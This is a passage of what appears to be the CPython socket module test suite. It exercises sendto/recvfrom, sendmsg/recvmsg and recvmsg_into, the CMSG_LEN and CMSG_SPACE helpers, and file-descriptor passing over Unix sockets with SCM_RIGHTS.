def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(socket.error) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(socket.error, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
with self.assertRaises(socket.timeout):
while True:
self.sendmsgToServer([b"a"*512])
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux2"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(socket.error) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(socket.error, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(socket.error, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
# FreeBSD < 8 doesn't always set the MSG_TRUNC flag when a truncated
# datagram is received (issue #13001).
@support.requires_freebsd_version(8)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
@support.requires_freebsd_version(8)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(socket.error, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
